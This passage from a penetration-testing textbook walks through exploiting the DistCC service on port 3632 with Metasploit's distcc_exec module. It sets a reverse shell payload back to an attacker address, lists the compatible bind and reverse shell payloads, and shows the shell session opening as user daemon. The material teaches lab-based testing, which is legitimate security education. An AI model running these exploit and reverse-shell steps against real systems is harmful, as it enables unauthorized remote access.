Simulated Penetration Test
263
when performing the attack. (Remember that in a penetration test we can’t
always rely on the defaults to be successful.)
Our scan finds that port 3632 is open and associated with
DistCC
. An
online search tells us that
DistCC
is a program that distributes builds of C/C++
code to several machines across a network, and it is vulnerable to an attack.
(When performing penetration tests, you will often encounter unfamiliar
applications and products, and you will need to research the application before
you can attack it.)
msf exploit(distcc_exec) >
set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(distcc_exec) >
set LHOST 172.16.32.129
LHOST => 172.16.32.129
shomsf exploit(distcc_exec) >
set RHOST 172.16.32.162
RHOST => 172.16.32.162
msf exploit(distcc_exec) >
show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/generic normal Unix Command, Generic command execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
msf exploit(distcc_exec) >
set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(distcc_exec) >
exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo q6Td9oaTrOkXsBXS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "q6Td9oaTrOkXsBXS\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.32.129:4444 -> 172.16.32.162:47002) at 2010-05-
22 00:08:04 -0400
whoami
daemon
mkdir /root/moo
mkdir: cannot create directory '/root/moo': Permission denied